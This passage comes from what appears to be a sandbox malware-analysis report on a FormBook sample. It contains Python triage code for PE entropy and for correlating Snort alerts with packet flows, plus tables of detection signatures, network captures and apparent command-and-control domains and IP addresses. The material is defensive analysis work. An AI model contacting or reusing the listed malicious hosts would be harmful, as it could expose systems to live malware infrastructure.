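        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        (chars,) = struct.unpack_from("<I", pe, off + 36)   # Characteristics is the last field
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "characteristics": chars,
            "entropy": shannon_entropy(raw),
        })
    return sections


def flag_packed_code(sections, threshold: float = 7.0) -> list:
    """Names of executable sections whose entropy exceeds the (assumed) triage threshold."""
    exec_mask = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
    return [s["name"] for s in sections if s["characteristics"] & exec_mask and s["entropy"] > threshold]


def build_test_pe(text_payload: bytes) -> bytes:
    """Constructed, non-runnable PE image with a single .text section, only for exercising the parser offline."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = b"\0" * 0xE0                                      # placeholder PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    rawptr = len(dos) + 4 + len(coff) + len(opt) + 40       # raw data starts right after the headers
    sechdr = struct.pack("<8sIIIIIIHHI", b".text", len(text_payload), 0x2000, len(text_payload),
                         rawptr, 0, 0, 0, 0, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    return dos + b"PE\0\0" + coff + opt + sechdr + text_payload


if __name__ == "__main__":
    for label, payload in (("high-entropy .text", bytes(range(256)) * 16),
                           ("plain .text", b"\x90" * 2048 + b"\xc3" * 2048)):
        secs = parse_sections(build_test_pe(payload))
        print(label, [(s["name"], hex(s["va"]), round(s["entropy"], 2)) for s in secs],
              "flagged:", flag_packed_code(secs))
```

Run against a real file, `parse_sections(open(path, "rb").read())` gives the same columns the report shows (name, virtual address, virtual size, raw size, characteristics, entropy); the threshold is deliberately a parameter because legitimate binaries with embedded compressed resources also score high, and the verdict here rests on the combination of a high-entropy code section with the minimal .NET import table above.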

Resources

Name           RVA      Size     Type                                             Language  Country
RT_ICON        0x78130  0x10828  data
RT_GROUP_ICON  0x88958  0x14     data
RT_VERSION     0x8896c  0x324    data
RT_MANIFEST    0x88c90  0xc0f    XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2018
Assembly Version  1.0.0.0
InternalName      ObjectMap.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       RegisterVB
ProductVersion    1.0.0.0
FileDescription   RegisterVB
OriginalFilename  ObjectMap.exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
02/23/21-08:57:55.635872  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49731        80         192.168.2.5     34.102.136.180
02/23/21-08:57:55.635872  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49731        80         192.168.2.5     34.102.136.180
02/23/21-08:57:55.635872  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49731        80         192.168.2.5     34.102.136.180
02/23/21-08:57:55.775060  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49731      34.102.136.180  192.168.2.5
02/23/21-08:58:17.613406  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49736        80         192.168.2.5     34.90.54.238
02/23/21-08:58:17.613406  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49736        80         192.168.2.5     34.90.54.238
02/23/21-08:58:17.613406  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49736        80         192.168.2.5     34.90.54.238
02/23/21-08:58:22.815170  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.5     34.102.136.180
02/23/21-08:58:22.815170  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.5     34.102.136.180
02/23/21-08:58:22.815170  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.5     34.102.136.180
02/23/21-08:58:22.954350  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49737      34.102.136.180  192.168.2.5
02/23/21-08:58:59.639218  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49740      23.227.38.74    192.168.2.5

Network Port Distribution (chart not reproduced)

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Feb 23, 2021 08:57:44.081270933 CET  49729        80         192.168.2.5      50.87.196.120
Feb 23, 2021 08:57:44.267616987 CET  80           49729      50.87.196.120    192.168.2.5
Feb 23, 2021 08:57:44.267728090 CET  49729        80         192.168.2.5      50.87.196.120
Feb 23, 2021 08:57:44.267937899 CET  49729        80         192.168.2.5      50.87.196.120
Feb 23, 2021 08:57:44.452924967 CET  80           49729      50.87.196.120    192.168.2.5
Feb 23, 2021 08:57:44.464051008 CET  80           49729      50.87.196.120    192.168.2.5
Feb 23, 2021 08:57:44.464297056 CET  80           49729      50.87.196.120    192.168.2.5
Feb 23, 2021 08:57:44.464313030 CET  49729        80         192.168.2.5      50.87.196.120
Feb 23, 2021 08:57:44.464510918 CET  49729        80         192.168.2.5      50.87.196.120
Feb 23, 2021 08:57:44.651365995 CET  80           49729      50.87.196.120    192.168.2.5
Feb 23, 2021 08:57:50.103084087 CET  49730        80         192.168.2.5      170.106.171.56
Feb 23, 2021 08:57:50.306849957 CET  80           49730      170.106.171.56   192.168.2.5
Feb 23, 2021 08:57:50.307043076 CET  49730        80         192.168.2.5      170.106.171.56
Feb 23, 2021 08:57:50.307199955 CET  49730        80         192.168.2.5      170.106.171.56
Feb 23, 2021 08:57:50.510967970 CET  80           49730      170.106.171.56   192.168.2.5
Feb 23, 2021 08:57:50.513550997 CET  80           49730      170.106.171.56   192.168.2.5
Feb 23, 2021 08:57:50.513581991 CET  80           49730      170.106.171.56   192.168.2.5
Feb 23, 2021 08:57:50.513596058 CET  80           49730      170.106.171.56   192.168.2.5
Feb 23, 2021 08:57:50.513766050 CET  49730        80         192.168.2.5      170.106.171.56
Feb 23, 2021 08:57:50.513847113 CET  49730        80         192.168.2.5      170.106.171.56
Feb 23, 2021 08:57:50.516586065 CET  49730        80         192.168.2.5      170.106.171.56
Feb 23, 2021 08:57:50.720447063 CET  80           49730      170.106.171.56   192.168.2.5
Feb 23, 2021 08:57:55.594748020 CET  49731        80         192.168.2.5      34.102.136.180
Feb 23, 2021 08:57:55.635528088 CET  80           49731      34.102.136.180   192.168.2.5
Feb 23, 2021 08:57:55.635716915 CET  49731        80         192.168.2.5      34.102.136.180
Feb 23, 2021 08:57:55.635871887 CET  49731        80         192.168.2.5      34.102.136.180
Feb 23, 2021 08:57:55.676275969 CET  80           49731      34.102.136.180   192.168.2.5
Feb 23, 2021 08:57:55.775059938 CET  80           49731      34.102.136.180   192.168.2.5
Feb 23, 2021 08:57:55.775103092 CET  80           49731      34.102.136.180   192.168.2.5
Feb 23, 2021 08:57:55.775355101 CET  49731        80         192.168.2.5      34.102.136.180
Feb 23, 2021 08:57:55.775441885 CET  49731        80         192.168.2.5      34.102.136.180
Feb 23, 2021 08:57:55.815941095 CET  80           49731      34.102.136.180   192.168.2.5
Feb 23, 2021 08:58:01.040714025 CET  49732        80         192.168.2.5      156.240.32.114
Feb 23, 2021 08:58:01.260431051 CET  80           49732      156.240.32.114   192.168.2.5
Feb 23, 2021 08:58:01.264575005 CET  49732        80         192.168.2.5      156.240.32.114
Feb 23, 2021 08:58:01.264838934 CET  49732        80         192.168.2.5      156.240.32.114
Feb 23, 2021 08:58:01.483952999 CET  80           49732      156.240.32.114   192.168.2.5
Feb 23, 2021 08:58:01.486218929 CET  80           49732      156.240.32.114   192.168.2.5
Feb 23, 2021 08:58:01.486253023 CET  80           49732      156.240.32.114   192.168.2.5
Feb 23, 2021 08:58:01.486402988 CET  49732        80         192.168.2.5      156.240.32.114
Feb 23, 2021 08:58:01.486474991 CET  49732        80         192.168.2.5      156.240.32.114
Feb 23, 2021 08:58:01.705612898 CET  80           49732      156.240.32.114   192.168.2.5
Feb 23, 2021 08:58:06.594165087 CET  49734        80         192.168.2.5      13.57.130.120
Feb 23, 2021 08:58:06.797530890 CET  80           49734      13.57.130.120    192.168.2.5
Feb 23, 2021 08:58:06.797717094 CET  49734        80         192.168.2.5      13.57.130.120
Feb 23, 2021 08:58:06.798021078 CET  49734        80         192.168.2.5      13.57.130.120
Feb 23, 2021 08:58:07.001307964 CET  80           49734      13.57.130.120    192.168.2.5
Feb 23, 2021 08:58:07.001431942 CET  80           49734      13.57.130.120    192.168.2.5
Feb 23, 2021 08:58:07.001451015 CET  80           49734      13.57.130.120    192.168.2.5
Feb 23, 2021 08:58:07.001702070 CET  49734        80         192.168.2.5      13.57.130.120
Feb 23, 2021 08:58:07.001868963 CET  49734        80         192.168.2.5      13.57.130.120
Feb 23, 2021 08:58:07.205092907 CET  80           49734      13.57.130.120    192.168.2.5
Feb 23, 2021 08:58:12.075892925 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.203922987 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.204191923 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.204418898 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.338124037 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338160992 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338188887 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338217020 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338243961 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338269949 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338298082 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338330984 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338361025 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338387966 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.338392019 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.338432074 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.338438988 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.338443995 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.465953112 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.465997934 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466032982 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466078043 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466116905 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466129065 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.466150999 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.466152906 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466188908 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466224909 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466259003 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466264963 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.466269970 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.466295004 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466329098 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466375113 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466408968 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:12.466523886 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.466530085 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.466532946 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.466696024 CET  49735        80         192.168.2.5      54.85.86.211
Feb 23, 2021 08:58:12.593298912 CET  80           49735      54.85.86.211     192.168.2.5
Feb 23, 2021 08:58:17.565337896 CET  49736        80         192.168.2.5      34.90.54.238
Feb 23, 2021 08:58:17.613014936 CET  80           49736      34.90.54.238     192.168.2.5
Feb 23, 2021 08:58:17.613121986 CET  49736        80         192.168.2.5      34.90.54.238
Feb 23, 2021 08:58:17.613405943 CET  49736        80         192.168.2.5      34.90.54.238
Feb 23, 2021 08:58:17.661071062 CET  80           49736      34.90.54.238     192.168.2.5
Feb 23, 2021 08:58:17.661597013 CET  80           49736      34.90.54.238     192.168.2.5
Feb 23, 2021 08:58:17.661609888 CET  80           49736      34.90.54.238     192.168.2.5
Feb 23, 2021 08:58:17.661828995 CET  49736        80         192.168.2.5      34.90.54.238
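Read together, the Snort table and the TCP packet list tell the story of the check-in loop: the host opens a fresh connection to a different destination every five to six seconds (49729 at 08:57:44, 49730 at 08:57:50, 49731 at 08:57:55, and so on), and the FormBook check-in signatures fire on the first outbound data packet of only some of those flows (49731, 49736, 49737), with the server answering two of them with a 403. The following is an added triage example, not code from the report or from Joe Sandbox: it rebuilds client-side flows from packet lines, joins the Snort alerts to them on the client's ephemeral port, measures the spacing between consecutive flows, and lists the destinations that triggered a check-in SID. The excerpts it embeds are constructed from the two tables above with space-separated columns (the rendered page fuses them); the SID set is the three ET rule IDs from the Snort table.

```python
import re
from datetime import datetime

# Constructed excerpts in the report's TCP-packet and Snort-alert layouts, columns space-separated here.
TCP_PACKETS = """\
Feb 23, 2021 08:57:44.081270933 CET 49729 80 192.168.2.5 50.87.196.120
Feb 23, 2021 08:57:44.267616987 CET 80 49729 50.87.196.120 192.168.2.5
Feb 23, 2021 08:57:44.267937899 CET 49729 80 192.168.2.5 50.87.196.120
Feb 23, 2021 08:57:55.594748020 CET 49731 80 192.168.2.5 34.102.136.180
Feb 23, 2021 08:57:55.635528088 CET 80 49731 34.102.136.180 192.168.2.5
Feb 23, 2021 08:57:55.635871887 CET 49731 80 192.168.2.5 34.102.136.180
Feb 23, 2021 08:58:17.565337896 CET 49736 80 192.168.2.5 34.90.54.238
Feb 23, 2021 08:58:17.613014936 CET 80 49736 34.90.54.238 192.168.2.5
"""

SNORT_ALERTS = """\
02/23/21-08:57:55.635872 TCP 2031412 ET TROJAN FormBook CnC Checkin (GET) 49731 80 192.168.2.5 34.102.136.180
02/23/21-08:57:55.775060 TCP 1201 ATTACK-RESPONSES 403 Forbidden 80 49731 34.102.136.180 192.168.2.5
02/23/21-08:58:17.613406 TCP 2031412 ET TROJAN FormBook CnC Checkin (GET) 49736 80 192.168.2.5 34.90.54.238
"""

FORMBOOK_CHECKIN_SIDS = {2031412, 2031449, 2031453}   # the ET SIDs listed in the report's Snort table

PKT_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) \w+ (\d+) (\d+) (\S+) (\S+)$")
ALERT_RE = re.compile(r"^(\S+) (\S+) (\d+) (.+?) (\d+) (\d+) (\S+) (\S+)$")


def parse_packets(text):
    """Yield (timestamp, src_port, dst_port, src_ip, dst_ip) tuples from report-style packet lines."""
    pkts = []
    for line in text.splitlines():
        m = PKT_RE.match(line.strip())
        if not m:
            continue
        base, frac, sport, dport, sip, dip = m.groups()
        # strptime takes at most 6 fractional digits; the report logs 9, so truncate to microseconds.
        ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
        pkts.append((ts, int(sport), int(dport), sip, dip))
    return pkts


def build_flows(packet_text, client_ip):
    """Group packets into flows keyed by the client's ephemeral port; count packets per direction."""
    flows = {}
    for ts, sport, dport, sip, dip in parse_packets(packet_text):
        if sip == client_ip:
            key, direction = (sport, dip, dport), "out"
        elif dip == client_ip:
            key, direction = (dport, sip, sport), "in"
        else:
            continue
        f = flows.setdefault(key, {"client_port": key[0], "remote": key[1], "remote_port": key[2],
                                   "first_seen": ts, "out": 0, "in": 0, "alerts": []})
        f["first_seen"] = min(f["first_seen"], ts)
        f[direction] += 1
    return sorted(flows.values(), key=lambda f: f["first_seen"])


def attach_alerts(flows, alert_text, client_ip):
    """Join Snort alerts to flows on the client-side port, whichever direction the alert fired in."""
    by_port = {f["client_port"]: f for f in flows}
    for line in alert_text.splitlines():
        m = ALERT_RE.match(line.strip())
        if not m:
            continue
        _ts, _proto, sid, msg, sport, dport, sip, _dip = m.groups()
        port = int(sport) if sip == client_ip else int(dport)
        if port in by_port:
            by_port[port]["alerts"].append((int(sid), msg))
    return flows


def cadence_seconds(flows):
    """Seconds between the first packets of consecutive flows (the check-in interval)."""
    return [round((b["first_seen"] - a["first_seen"]).total_seconds(), 6)
            for a, b in zip(flows, flows[1:])]


def c2_candidates(flows):
    """Destinations whose flow carried at least one FormBook check-in signature."""
    return sorted({f["remote"] for f in flows
                   if any(sid in FORMBOOK_CHECKIN_SIDS for sid, _ in f["alerts"])})


if __name__ == "__main__":
    flows = attach_alerts(build_flows(TCP_PACKETS, "192.168.2.5"), SNORT_ALERTS, "192.168.2.5")
    for f in flows:
        print(f["client_port"], f["remote"], f["out"], "out", f["in"], "in", [s for s, _ in f["alerts"]])
    print("cadence:", cadence_seconds(flows))
    print("check-in destinations:", c2_candidates(flows))
```

Joining on the ephemeral port rather than on timestamps is deliberate: the Snort timestamp (08:57:55.635872) is the same instant as the third packet of flow 49731 only to microsecond precision, while the port is unique per connection for the life of the capture. A destination that completed a TCP exchange without any signature firing (50.87.196.120 here) is not cleared by this; it simply did not carry a request the ruleset recognises.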

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 08:56:35.955482960 CET | 52704 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:36.007077932 CET | 53 | 52704 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:36.239656925 CET | 52212 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:36.291347027 CET | 53 | 52212 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:36.403825045 CET | 54302 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:36.452589035 CET | 53 | 54302 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:36.565407038 CET | 53784 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:36.614387989 CET | 53 | 53784 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:37.193017960 CET | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:37.244647980 CET | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:37.477365017 CET | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:37.526056051 CET | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:38.939780951 CET | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:38.988445044 CET | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:39.876188040 CET | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:39.924889088 CET | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:40.971841097 CET | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:41.029036999 CET | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:41.937917948 CET | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:41.987518072 CET | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:43.116148949 CET | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:43.142633915 CET | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:43.174614906 CET | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:43.207350969 CET | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:44.577920914 CET | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:44.626645088 CET | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:45.774638891 CET | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:45.823354006 CET | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:47.020380974 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:47.072390079 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:48.178019047 CET | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:48.229912043 CET | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:49.320511103 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:49.369152069 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:56:50.716367960 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:56:50.768454075 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:04.596348047 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:04.658051014 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:15.954601049 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:16.007508039 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:30.171575069 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:30.234869957 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:32.386890888 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:32.399264097 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:32.435621023 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:32.457739115 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:32.559315920 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:32.608166933 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:42.624135971 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:43.626622915 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:43.685693026 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:43.926274061 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:44.073349953 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:49.474215031 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:50.102022886 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:57:55.522838116 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:57:55.593292952 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:00.814778090 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:01.037513971 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:02.300045967 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:02.370999098 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:06.523142099 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:06.592775106 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:12.012454987 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:12.074486971 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:17.494049072 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:17.563788891 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:22.681061029 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:22.772489071 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:27.961551905 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:28.023690939 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:33.085443974 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:33.297590971 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:54.751465082 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:54.816216946 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Feb 23, 2021 08:58:59.339791059 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Feb 23, 2021 08:58:59.422525883 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 08:57:43.926274061 CET | 192.168.2.5 | 8.8.8.8 | 0x14bd | Standard query (0) | www.abaplants.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:57:49.474215031 CET | 192.168.2.5 | 8.8.8.8 | 0x349 | Standard query (0) | www.cyjulebu.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:57:55.522838116 CET | 192.168.2.5 | 8.8.8.8 | 0x25e1 | Standard query (0) | www.denisekohli.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:00.814778090 CET | 192.168.2.5 | 8.8.8.8 | 0x6f16 | Standard query (0) | www.hostsnc.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:06.523142099 CET | 192.168.2.5 | 8.8.8.8 | 0xadb4 | Standard query (0) | www.assemble-4u.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:12.012454987 CET | 192.168.2.5 | 8.8.8.8 | 0x756c | Standard query (0) | www.raphaelyejesiel.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:17.494049072 CET | 192.168.2.5 | 8.8.8.8 | 0x4002 | Standard query (0) | www.your-new-body-plan.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:22.681061029 CET | 192.168.2.5 | 8.8.8.8 | 0x6611 | Standard query (0) | www.softwaresreports.info | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:27.961551905 CET | 192.168.2.5 | 8.8.8.8 | 0x1d8b | Standard query (0) | www.gdzas08.cloud | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:33.085443974 CET | 192.168.2.5 | 8.8.8.8 | 0x90d5 | Standard query (0) | www.athomecp.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:54.751465082 CET | 192.168.2.5 | 8.8.8.8 | 0x5ac6 | Standard query (0) | www.athomecp.com | A (IP address) | IN (0x0001)
Feb 23, 2021 08:58:59.339791059 CET | 192.168.2.5 | 8.8.8.8 | 0x70be | Standard query (0) | www.shamansmoke.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 08:57:44.073349953 CET | 8.8.8.8 | 192.168.2.5 | 0x14bd | No error (0) | www.abaplants.com | abaplants.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:57:44.073349953 CET | 8.8.8.8 | 192.168.2.5 | 0x14bd | No error (0) | abaplants.com | - | 50.87.196.120 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET | 8.8.8.8 | 192.168.2.5 | 0x349 | No error (0) | www.cyjulebu.com | jinrifresh.web7.cname-cdn.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET | 8.8.8.8 | 192.168.2.5 | 0x349 | No error (0) | jinrifresh.web7.cname-cdn.com | al27.cname-url.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET | 8.8.8.8 | 192.168.2.5 | 0x349 | No error (0) | al27.cname-url.com | 104.233.225.185.cname-url.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:57:50.102022886 CET | 8.8.8.8 | 192.168.2.5 | 0x349 | No error (0) | 104.233.225.185.cname-url.com | - | 170.106.171.56 | A (IP address) | IN (0x0001)
Feb 23, 2021 08:57:55.593292952 CET | 8.8.8.8 | 192.168.2.5 | 0x25e1 | No error (0) | www.denisekohli.com | denisekohli.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 08:57:55.593292952 CET | 8.8.8.8 | 192.168.2.5 | 0x25e1 | No error (0) | denisekohli.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
